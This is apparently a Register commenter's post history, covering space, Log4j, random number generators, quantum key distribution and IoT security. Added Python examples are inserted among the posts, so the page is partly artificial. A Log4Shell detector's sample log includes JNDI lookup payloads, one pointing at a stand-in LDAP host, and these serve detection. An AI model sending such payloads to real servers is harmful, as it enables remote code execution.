* Posts by Paul Uszak

59 posts • joined 20 Jan 2009


The James Webb Space Telescope has only gone and deployed its primary mirror

Paul Uszak

"A camera would be nothing be(sic) PR."

A. Does anyone remember the oxygen consumption of Apollo 14? What is the current main data transmission rate of Voyager 1? Can anyone imagine the shape of dust storms on Mars?

B. Does anyone remember Neil Armstrong climbing down the ladder onto the Moon? Have you ever witnessed a total solar eclipse? Have you ever witnessed a launch of the space shuttle?

Which excites you the most, A or B? PR is everything. Unfortunately scientists and engineers don’t really understand that. Science does not speak for itself. If the JWST didn’t have cameras, then put them on. Figure it out; it’s NASA. Hire an advertising firm. They did it for Apollo 11 which also didn’t need the additional complexity.

And this is what Musk, Bezos and Branson understand. This is why the Millau Viaduct is widely known as having been built by Norman Foster. This is why was Trump, and why he could serve another two terms.

I respectfully yet forcefully suggest that all science and engineering courses should include marketing components. Otherwise we’re all going to end up like Nebraska.

Secure boot for UK electric car chargers isn't mandatory until 2023 – but why the delay?

Paul Uszak

Re: Solution to car charger issues...

Tsk, tsk. Of course I was referring to the new pound coins. The ones with Bluetooth.

Paul Uszak

Solution to car charger issues...

Why not just put pound coins into the all mechanical machine? Like those little bubble gum dispensers. Then turn the silver handle to get the juice. Hack that. It could also dispense bubble gum for use whilst charging.

Log4j RCE latest: In case you hadn't noticed, this is Really Very Bad, exploited in the wild, needs urgent patching

Paul Uszak

I suggest that this is a manifestation of the open source movement, and I'm being nice (honest). It would take a lot to persuade a commercial vendor to include all this (unnecessary) stuff into a retail library. Time is money and there's probably little user demand for JNDI/RMI/LDAP features in logging.

But all commercial/managerial sense goes out of the window for most open source stuff. If you're doing it as an unpaid hobby, then why not? It's fun. Some might even consider it art. Anything goes if there's no market strategy (and there's no market). New features creep in unchecked as young developers 'play' with the latest cool thing, irrespective of whether there's any demand for them. Therein lies the RMI and the problem...

Paul Uszak

This is all very complicated and I don't understand it. A logging library needs JNDI, RMI and LDAP functionality? Beyond PRINT (message)? Maybe it's a joke. Very fortunately, I use JULI Commons and I've just found:-

GET /$%7Bjndi:dns:// HTTP/1.1" 404 878 "${jndi:dns://}

in my web server log file....
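A detector for the kind of line the poster found, as an added example that is not code from the thread or from any logging project. It percent-decodes each access-log line (repeatedly, because probes are often double-encoded) and reports the lookup scheme of every `${jndi:` string it finds. The first sample line mirrors the fragment quoted above; the rest are constructed, and the function names are my own.

```python
"""Scan web-server access-log lines for Log4Shell-style JNDI probe strings.

Added example, not code from the original thread. The first sample line
mirrors the fragment the poster found in his log; the other lines are
constructed test data. Function names are my own choice.
"""
import re
from urllib.parse import unquote

# "${jndi:<scheme>:" in any letter case, tolerating stray whitespace.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def fully_decode(text: str, max_rounds: int = 3) -> str:
    """Percent-decode until the text stops changing (probes are often double-encoded)."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_jndi_probes(line: str) -> list[str]:
    """Return the lookup schemes (dns, ldap, rmi, ...) of every JNDI probe in one line."""
    return [m.group(1).lower() for m in JNDI_RE.finditer(fully_decode(line))]


def scan_log(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (line_number, schemes) for each line that carries at least one probe."""
    hits = []
    for number, line in enumerate(lines, start=1):
        schemes = find_jndi_probes(line)
        if schemes:
            hits.append((number, schemes))
    return hits


# Constructed sample log (combined log format); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:12:00:01 +0000] "GET /$%7Bjndi:dns:// HTTP/1.1" 404 878 "${jndi:dns://}" "-"',
    '198.51.100.4 - - [10/Dec/2021:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 5120 "-" "%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D"',
    '198.51.100.6 - - [10/Dec/2021:12:00:04 +0000] "GET /$%257Bjndi:rmi:// HTTP/1.1" 404 878 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for number, schemes in scan_log(SAMPLE_LOG):
        print(f"line {number}: JNDI probe via {', '.join(schemes)}")
```

The scheme is worth keeping in the report: a `dns:` probe is usually a scanner checking whether anything resolves, whereas `ldap:` or `rmi:` indicates an attempt to fetch a payload, so the two merit different triage. The decoder is deliberately simple; a request that is only mangled in a log line should be treated as a reason to check the application's own logs rather than as proof of exploitation.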

How to destroy expensive test kit: What does that button do?

Paul Uszak

Re: Expensive test equipment

Alternative networks? You mean police/FBI Stingers?

ESA's Mars Express picks up plaintive bleeps of China's Zhurong rover, adding much-needed comms redundancy

Paul Uszak

Faster than Plusnet then...

Another brick in the (kitchen) wall: Users report frozen 1st generation Google Home Hubs

Paul Uszak

Re: Why is Google not liable for damages?

With respect, bollocks.

Go on and try. Go to Curry's and try to take back your three year old TV that's now been bricked. Explain your consumer rights. Draw a diagram. Cause a scene. The Saturday girl will press the panic alarm, the police will be called. Then you might be tasered because that's the most convenient thing to do before lunch break. The police might use chemical weapons on you too. There were 492,000 recorded incidents where a police officer reported the use of force on an individual in England and Wales in the year to March. Argos is probably the same.

If it bricks, count yourself lucky that it was the device and not you. I'm referencing Jordan Walker-Brown who'll never walk again. Now about that TV...

Paul Uszak

Why is Google not liable for damages?

Isn't it time that legislation was passed to recover damages from the up-daters?

If you take your car to the garage for an MOT and it falls off the ramp and is damaged, the garage is liable. Same with services delivered to patients at a hospital. Surely Google/IT provider should be liable for damages too. Either fix the code, or if totally bricked replace it. This would force companies to test upgrades rather than have the end users do so.

I understand that software is a little different to hardware, but is it actually? Is it only different in the consumers' minds because they want us to think that way? Now extrapolate and go forward in time. I foresee all products having embedded software and network connectivity. What if all my beer cans get bricked due to a wonky ASDA.OS up-date and I can't remotely open them? I'd want pre-cooled replacements.

Perhaps the consumer needs a paradigm shift.

Product release cycles are killing the environment, techies tell British Computer Society

Paul Uszak

Complete waste of time.

:-( I can nullify every single argument anyone will ever make with one simple word: "Safety".

Think your phone is snooping on you? Hold my beer, says basic physics

Paul Uszak

Re: This is mildly terrifying

"If you give me six lines written by the hand of the most honest of men, I will find something in them which will hang him."

It had to happen: Microsoft's cloudy Windows 365 desktops are due to land next month

Paul Uszak

Re: So now

You've misunderstood the Book:-

A "new heaven" and "new earth" (Azure) replace the old heaven and old earth. There is no more suffering or death. (21:1–8) (no more need for patching).

God comes to dwell with humanity in the New Jerusalem. (21:2–8) (Bill walks amongst us/the poor, not in armoured helicopter).

Description of the New Jerusalem. (21:9–27) (Microsoft campus on Mars).

The River of Life and the Tree of Life appear for the healing of the nations and peoples. The curse of sin is ended. (22:1–5) (Linux is defeated and we are shown the way of the Cloud).

And in Conclusion:-

Bill's reassurance that Windows 12's coming is imminent. Final admonitions. (22:6–21)

Tim Cook: Sideloading is a disaster and proposed App Store reforms would harm user privacy and security

Paul Uszak

Re: It wouldn't be for people who like to tinker

Deleted by unpatriotic socialists who don't respect the will of the people. This is why President Trump is endeavouring to curb the bigotry and censorship of big tech.

Paul Uszak

Re: It wouldn't be for people who like to tinker

>Firearms have the potential to hurt people and few other uses.

One of those uses is to enforce democracy.

Kaspersky Password Manager's random password generator was about as random as your wall clock

Paul Uszak


Oh dear. Rolling your own crypto :-(

Please read https://crypto.stackexchange.com/questions/43272/why-is-writing-your-own-encryption-discouraged .

Plus 6.1E15 is nothing. Sorry. Stick to the tried stuff, or try to use one time pads if security is of such concern. But for that you'll need access to a trusted TRNG. Which you'll have to build yourself. 100% un-breakability comes at a price.

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

ERNIE: It wasn't a differencing operation. It was simply amplifying the electrical noise on a QS92 regulating valve (http://www.r-type.org/exhib/aag0022.htm). That then gated a counter and the numbers popped out using:- https://i.stack.imgur.com/cHpf9.png.

TrueRND: I too have one :-( Not really happy with it. But please remember on what article we are commenting on/getting excited. There is a concept called computational indistinguishability. That means you cannot differentiate a pseudo random sequence from a truly random sequence, no matter how hard you try. It's just the maths/statistics. That applies to TrueRND too. That's why the only solution that provides 100% confidence is a self build.

But most don't care, so ignore my ranting and I've got the lawn to mow...

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

It's this easy, If you have batteries and a Zener diode:- http://www.reallyreallyrandom.com/zener/breadboard/

Just suck up the entropy with a microcontroller of your choice.
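What "sucking up the entropy" looks like once the bits reach the microcontroller, as an added example that is not the poster's or the linked site's code. The comparator is a constructed, deliberately biased PRNG standing in for the sampled diode noise; the rest is the generic firmware-side pipeline: a stuck-source health test, then von Neumann debiasing, which removes any fixed bias from independent samples at the cost of discarding most of them. Function names are my own.

```python
"""Conditioning raw bits from a noisy analogue source, as firmware on a
microcontroller would. Added example, not the poster's or the linked site's
code. The 'comparator' below is a constructed, deliberately biased PRNG
standing in for the sampled Zener noise; everything else is generic.
"""
import random


def noisy_comparator(n_samples: int, p_one: float = 0.62, seed: int = 7) -> list[int]:
    """Constructed raw source: independent but biased bits, like a comparator with a poor threshold."""
    rng = random.Random(seed)
    return [1 if rng.random() < p_one else 0 for _ in range(n_samples)]


def von_neumann(raw: list[int]) -> list[int]:
    """Remove bias by pairing bits: 01 -> 0, 10 -> 1, 00 and 11 discarded.
    Works for any independent bias, at the cost of throwing away most samples."""
    return [a for a, b in zip(raw[0::2], raw[1::2]) if a != b]


def bias(bits: list[int]) -> float:
    """Fraction of ones (0.5 for an unbiased stream)."""
    return sum(bits) / len(bits)


def stuck_source(raw: list[int], cutoff: int = 64) -> bool:
    """Health test: True if any run of identical bits reaches the cutoff,
    which a dead diode, a broken ADC or a saturated amplifier would produce."""
    run = 1
    for prev, cur in zip(raw, raw[1:]):
        run = run + 1 if cur == prev else 1
        if run >= cutoff:
            return True
    return False


def harvest(raw: list[int]) -> list[int]:
    """Firmware-style pipeline: refuse a stuck source, otherwise debias."""
    if stuck_source(raw):
        raise RuntimeError("noise source failed health test; refusing to emit bits")
    return von_neumann(raw)


if __name__ == "__main__":
    raw = noisy_comparator(100_000)
    out = harvest(raw)
    print(f"raw bias {bias(raw):.3f}, {len(out)} debiased bits with bias {bias(out):.3f}")
```

Von Neumann's trick assumes the samples are independent; if the diode's noise is correlated between samples (sampling faster than the amplifier's bandwidth allows, for instance) the output stays biased, which is why a real design also feeds the conditioned bits through a cryptographic hash and keeps the health test running continuously rather than once at start-up.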

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

Actually NIST doesn't. Not for crypto. That's a common fallacy. It's in the front matter, quoting from NIST 800-90b:-

"This publication has been developed by NIST in accordance with its statutory responsibilities under the [Federal Information Security Modernization Act (FISMA) of 2014, 44 U.S.C. § 3551 et seq.](https://www.congress.gov/113/plaws/publ283/PLAW-113publ283.pdf), Public Law (P.L.) 113-283. NIST is responsible for developing information security standards and guidelines, including minimum requirements for federal information systems, but such standards and guidelines shall not apply to national security systems without the express approval of appropriate federal officials exercising policy authority over such systems. "

Which says:-

"§ 3553. Authority and functions of the Director and the Secretary:-

‘‘(d) NATIONAL SECURITY SYSTEMS.—Except for the authorities and functions described in subsection (a)(5) and subsection (c), the authorities and functions of the Director and the Secretary under this section shall not apply to national security systems.

‘‘(e) DEPARTMENT OF DEFENSE AND INTELLIGENCE COMMUNITY SYSTEMS.—(1) The authorities of the Director described in paragraphs (1) and (2) of subsection (a) shall be delegated to the Secretary of Defense in the case of systems described in paragraph (2) and to the Director of National Intelligence in the case of systems described in paragraph (3)."

So, good enough for the people, but not (US) national security?

Paul Uszak

Re: If you value your security get a hardware random number generator -- or two

Read you loud and clear. Some of us are already trying to do that:-


Quantum Key Distribution: Is it as secure as claimed and what can it offer the enterprise?

Paul Uszak

Re: So the whole point is?

Well I think that you'd have to be in the presence of the fibres. Perhaps you could tie a really tight knot that would choke off the internet. The keys wouldn't be able to get through if the knot radius was less than the diameter of standard cryptographic photons. Or use plumbers' freezing spray to really slow them down.

Paul Uszak

Re: So the whole point is?

Err, no. The system is quantum as it deals with the generation, transmission and measurement of photon polarizations. The point is (quoting from the BB84 paper, https://arxiv.org/pdf/2003.06557.pdf):-

"...when information is encoded in non-orthogonal quantum states, such as single photons with polarization directions 0, 45, 90, and 135 degrees, one obtains a communications channel whose transmissions in principle cannot be read or copied reliably by an eavesdropper ignorant of certain key information used in forming the transmission. The eavesdropper cannot even gain partial information about such a transmission without altering it in a random and uncontrollable way likely to be detected by the channel's legitimate users."

So I can send you 'stuff' with 100% confidence that no one has read it.

Paul Uszak

Re: Abe Lincoln knew the truth about QKD.

Please don't conflate a self-serving political system and the industrial-military complex with a cryptographic protocol. The article was about the protocol. This is why these threads go off the rails.

If you have insight into how QKD is cryptographically flawed that the organisations I listed don't, please put up. Mathematical detail would be a bonus :-)

Paul Uszak

Re: my "QKD for managers"

Oh dear. You've gotten the concept upside down. Interception is irrelevant. The beauty of QKD is that it is ALL about identity. The identity management comes from the Observer Effect of quantum physics. Any photon that is observed changes state. That's fundamental to the Universe, and exempt from any hardware resource considerations.

A "true MITM" relay would introduce measurable bases errors at the rate of an additional 50%. When Alice and Bob compare their expected results, the attack is detected. That is QKD's raison d'être. The original BB84 article is here: https://arxiv.org/pdf/2003.06557.pdf

And that's why everyone is getting QKDNs.
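The comparison step described in the posts above, as an added example that is not code from the thread or from the BB84 paper. It simulates one BB84 session with and without an intercept-resend relay sitting between Alice and Bob: photons are modelled as (bit, basis) pairs, measuring in the wrong basis gives a coin flip, and the relay re-sends whatever it measured in the basis it guessed. In the sifted key (positions where Alice's and Bob's bases agree) the relay causes roughly one error in four, since it guesses wrongly half the time and each wrong guess leaves Bob with a coin flip; the 11% abort threshold is the commonly cited BB84 bound above which no secure key can be distilled. The seeded PRNG is only for reproducibility.

```python
"""BB84 sifting with and without an intercept-resend relay between Alice and Bob.

Added example, not code from the thread or from the BB84 paper. Photons are
modelled classically as (bit, basis) pairs, which is enough to reproduce the
error statistics; the seeded PRNG is for reproducibility only, a real system
needs a hardware RNG for its bits and bases.
"""
import random

RECTILINEAR, DIAGONAL = 0, 1


def measure(state_bit: int, state_basis: int, basis: int, rng: random.Random) -> int:
    """Measuring in the preparation basis returns the bit; the other basis returns a coin flip."""
    return state_bit if basis == state_basis else rng.randrange(2)


def run_bb84(n_photons: int, relay_present: bool, seed: int = 1) -> dict:
    """Return sifted-key length, error count and QBER for one session."""
    rng = random.Random(seed)
    alice_bits = [rng.randrange(2) for _ in range(n_photons)]
    alice_bases = [rng.randrange(2) for _ in range(n_photons)]
    bob_bases = [rng.randrange(2) for _ in range(n_photons)]
    bob_bits = []
    for bit, a_basis, b_basis in zip(alice_bits, alice_bases, bob_bases):
        state_bit, state_basis = bit, a_basis
        if relay_present:
            # The relay measures in a guessed basis and re-sends what it saw,
            # so the photon leaves the relay prepared in the relay's basis.
            r_basis = rng.randrange(2)
            state_bit, state_basis = measure(state_bit, state_basis, r_basis, rng), r_basis
        bob_bits.append(measure(state_bit, state_basis, b_basis, rng))
    # Sifting: Alice and Bob announce bases publicly and keep only matching positions.
    sifted = [(a, b) for a, b, ab, bb in zip(alice_bits, bob_bits, alice_bases, bob_bases) if ab == bb]
    errors = sum(1 for a, b in sifted if a != b)
    return {"sifted": len(sifted), "errors": errors, "qber": errors / len(sifted) if sifted else 0.0}


def relay_detected(result: dict, threshold: float = 0.11) -> bool:
    """Alice and Bob sacrifice a sample of sifted bits to estimate the error rate;
    11% is the commonly cited BB84 threshold above which the session is aborted."""
    return result["qber"] > threshold


if __name__ == "__main__":
    for present in (False, True):
        r = run_bb84(20_000, present)
        print(f"relay={present}: sifted={r['sifted']} errors={r['errors']} "
              f"QBER={r['qber']:.3f} detected={relay_detected(r)}")
```

The model assumes a lossless, noise-free channel, so any error at all is attributable to the relay; real links have a baseline QBER from detector noise and fibre loss, which is why the protocol works with a threshold rather than demanding zero errors, and why the implementation-level points raised elsewhere in this thread (detector side channels, source imperfections) matter as much as the protocol itself.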

Paul Uszak

Abe Lincoln knew the truth about QKD.

He's attributed to have said "You can fool all the people some of the time and some of the people all the time, but you cannot fool all the people all the time."

But that's exactly what quantum deniers (QD) are espousing. Any relation to QA? The banks, the governments (https://spacenews.com/governments-ally-for-federated-quantum-encryption-satellite-network/), the universities, the militaries, Europe (https://spacenews.com/europe-picks-euroqci-satellite-quantum-communications-consortium/) are all going for QKDNs because they're secure when correctly implemented. They allow mathematically unbreakable one time pads to be distributed and used.

But of course they're all fools. We here know the truth, eh?

Paul Uszak

Re: my "QKD for managers"

And perhaps a more balanced answer: https://crypto.stackexchange.com/a/51364/23115.

Reiterating: The fundamental point is that you need to keep implementation distinct from protocol. AES-GCM is also pretty weak if the key is on a Post-it stuck to the monitor. As is RSA/DH if the random number generator is weak/subverted. Everyone should just calm down.

Mine's the one time pad over there...

23. 712. 3. 608. 45. 89. 11. 332. 841. 255. You want more? Cloudflare and pals are streaming 'em live from new RNG API

Paul Uszak

/dev/random ?

For those lucky enough to use Linux, there's always /dev/random for information theoretic secure random numbers. That will get you 10's of kbits/hr simply using your machine, and 20's of kbits/hr using PornHub. And there's /dev/urandom for infinite amounts of cryptographically secure numbers. We need education, not a lava lamp service...

It's nearly 2019, and your network can get pwned through an oscilloscope

Paul Uszak

The Rigol 1054 is one of the most popular scopes in the DIY space. It's brilliant for the price of ~£370. And it's wide open at the back too. No authentication at all, helped along with automatic DHCP so all one need do is to shove a network cable up its ass and it's on line.

You get full remote control of the scope, as well as total access to the sampling data. So you can read the wave forms from my little circuits. Great! The real issue is that this is a powered and networked computer with no sign on whatsoever. It may already be the case that it can be made to execute code remotely, due to some bug in the LXI command interface. What if you then can load malware onto it via Ethernet? Could you simply brick it for a bit of fun, or use it as a clandestine staging post for further exploits? Stuxnet-LXI perchance?

My nightmare is that my oscilloscope might be taken over and connect with my on-line wine chiller...

RIP... almost: Brit high street gadget shack Maplin Electronics

Paul Uszak

Why are you all dissing Maplins?

I don't understand what everyone's on about. They're an excellent shop. Look, you can buy a drill - https://www.maplin.co.uk/p/maplin-18v-lithium-ion-cordless-drill-n29lk. Just where else could you get one of these fine electronic devices (with built in batteries)? Not Toys'R'Us eh? And it's in stock at my local store. Save me a trip to Argos that will...

SK Telecom makes light of random numbers for IoT applications

Paul Uszak

I'll be queuing to buy one if I can just prove that mine's not simply outputting SHA256[NSAKey || CPUId, time_t].

Why don't people secure their IoT gadgets? 'It's not my problem'

Paul Uszak

So In summary...

... is it better? Considering all the problems of connected devices, and all the advantages, are we better off? Consider this in the wider context. It provides jobs and entertainment. Some smart stuff is actually life saving / life enhancing for the disabled. And it helps the terrorists. Some smart stuff also kills terrorists. So...

[Personally, I don't think that we are holistically better off with the IoT but I'm getting old and grumpy.]

Google's driverless car: It'll just block our roads. It's the worst

Paul Uszak

The courts will decide

Google and technology will not decide the viability of driverless vehicles. The courts will. What happens when the first child jumping out into the road is killed? Cue the lawyers. It will go to trial and the courts will have to decide who the defendant(s) are. It's likely that they will just ban that type of vehicle as surely as Segways are banned in Europe.

BMW tried a similar "advancement" when they brought out that weird motorbike with a fully surround roll cage. The idea that you wear a safety harness and have a roll cage might mean that you don't have to wear a safety helmet, thus making a motorbike more appealing. Unfortunately, the law says that on all two wheeled vehicles the driver has to wear a helmet. The project was cancelled.

NASA quandary: Should Curiosity channel Fast and Furious for Martian dune-buggy jump?

Paul Uszak

Re: So, they landed it in a hole...

"NASA is really, really good at going slow and careful."

Tell that to the relatives of the Challenger crew.

Chinese Moon rover, lander duo wake up after two-week snooze

Paul Uszak

Empty wall..?

If you want to see a wall, go see the Basra wall at the Staffordshire, UK, Arboretum. It's not empty.

Scientists discover supervolcano trigger that could herald humanity's doom

Paul Uszak


I'm booking my trip to Mars now. Anyone know the phone number for Virgin?

Battlefield Earth ruled worst film EVER

Paul Uszak

Re: Slightly out of touch el reg readers?

I like a genuine elitist with strong convictions. Norwegian?

Paul Uszak

Slightly out of touch el reg readers?

I find it slightly odd that the list contains Avatar and Titanic as bad films. Isn't it the case that those two films are the two highest grossing films ever made? That means a lot of people paid to go see them. Have all of those people been fooled? And then those people went and bought DVDs. Have all of those people been fooled all of the time?

Occam's Razor... Isn't it probably the case that the majority of el reg readers are a strange crowd instead?

UK.gov holds summit to stop satnav-driven smash-ups

Paul Uszak

Re: Remember the Blackadder gag about fitting wheels to a tomato ?

Reason you pay £70 for a download is that you're (as a group) happy to pay that. It's a luxury item and thus the price is totally unrelated to the cost. Marketing 101. Sorry.

Child abuse suspect won't be forced to decrypt hard drive

Paul Uszak

Other good news...

... is that this provides confirmation of the effectiveness of TrueCrypt. Presumably a lot of money has been spent on this case, so it (kinda) proves that the civilian authorities can't break the encryption. Don't know about the spooks in Langley though...

Microsoft cranks out Internet Explorer 10 preview

Paul Uszak

"...support emerging web standards not yet finished"

Oh dear. Déjà vu. So we'll be back to supporting IE's take on standards that aren't quite standard. I thought that we were trying to get away from browser specific functionality. Can't they wait a bit till the standards are written in stone...

Google 'personalizes' one in five searches

Paul Uszak

Does it matter?

Exactly how effective can google be? Loads of people use automatic cookie deletion apps, so all that leaves is ip addresses and they change for most users...

NHS hurls iPhone into booze abuse fray

Paul Uszak

Drinking is just one of the options

If we live in a (quasi)democracy isn't it my choice how to go? I've chosen to drink myself to death rather than die of bowel cancer on a hospital trolley, be shot by the police as a (we didn't really check) suspected terrorist or spend my last five years being beaten by some prevert council care home worker, but too daffy to realise it...

Filesharing laws to hit websites and newsgroups too

Paul Uszak

It's not all doom and gloom...

Whilst it looks like you're guilty until proven innocent, and you'll be fighting large media companies, this will probably blow over when a "significant" disconnection tries to happen.

I occasionally use wifi hotspots, and they're run by large corporations like airports and pub chains. At some point one of these is then going to get disconnected (or threatened with it). I look forward to the fallout when some ISP cuts off HSBC. Or Wetherspoons. Or Parliament itself. Things will then clear up.

El Reg's LHC visit - Deleted Scenes

Paul Uszak

Relativity 101 for dumbos

"Thought they were colliding at more like twice light speed (from our reference frame of course)"

Err, no. Two objects heading towards each other at the speed of light are still approaching at the speed of light relative to each other. You're kind of missing the whole idea of relativity...

US woman to drop sprog live on internet

Paul Uszak

Just nerds reading this?

Pretty biased commenting here eh? I'm just as frightened of the birth thing as the next geeknerd, but in the interests of fairness perhaps we should allow them(!) to express themselves.

Just as a matter of interest, has a female of the opposite sex ever posted on this site..?

Microsoft adds higher price to SQL Server's new features

Paul Uszak


You're joking, right? Are you really comparing Oracle Enterprise Edition with a MySQL knock-off? Name three international banks running Postgres...

ID Card scheme banking on 28 million volunteers

Paul Uszak

Luvly Goobly...

It makes me pleased to hear stuff like this. Crackpot public IT projects are just licences to print money for the IT suppliers. I can just imagine all the cancellation and loss of profits clauses being written into the current contracts.

I just wish I was still supplying the public sector - I need a holiday somewhere warm...

Sun's MySQL fork survival theory ripped

Paul Uszak

Mueller's got it wrong

I suspect that Mueller said what he said for other reasons. I think that Oracle are not out of the woods, although they may have thinned them out slightly.

A product's 'brand' is not just its name. You can easily change the name of the product and the product's reputation, performance, cost, placement remain. Witness Marathon > Snickers and Cloudscape > Derby. Both are well developed products that have not suffered simply because names have changed.

Also, remember who would drive the fight back. If the forked db were to be called DATABASE_637$, and maintained the current feature set, the techies who use it would not be fooled that the name had changed. They would see through the marketing. They saw through Vista's marketing to destroy that product, and everyone likes GIMP no matter how it sounds eh?

Oracle fails to convince MySQL doubters

Paul Uszak

@Anonymous Coward Posted Thursday 22nd October 2009 16:39 GMT

"I have never seen an enterprise product (BMC Remedy, HP OpenView, SAP, etc.) which uses MySQL or Oracle as it's underlying database"

Hmm, posted anonymously perhaps as you're from the flat text file school of databases? Some more experience (or reading) might help with this world view. I believe that there are one or two enterprise systems that run on Oracle. Also not sure if youtube, wikipedia and the weather channel count as enterprises but I think they run on MySQL.

Paul Uszak

It's not as bad as it could be...

One saving grace is that the source code is 'out there'. If Larry does lock down development, all the code showing how to do database things is available, and a forked public project becomes possible.

UK Border Agency suspends 'flawed' asylum DNA testing

Paul Uszak

Where does this lead?

Why not just measure the spacing of their eyes and the size of their heads? Oh hang on, that went pretty wrong...



Biting the hand that feeds IT © 1998–2022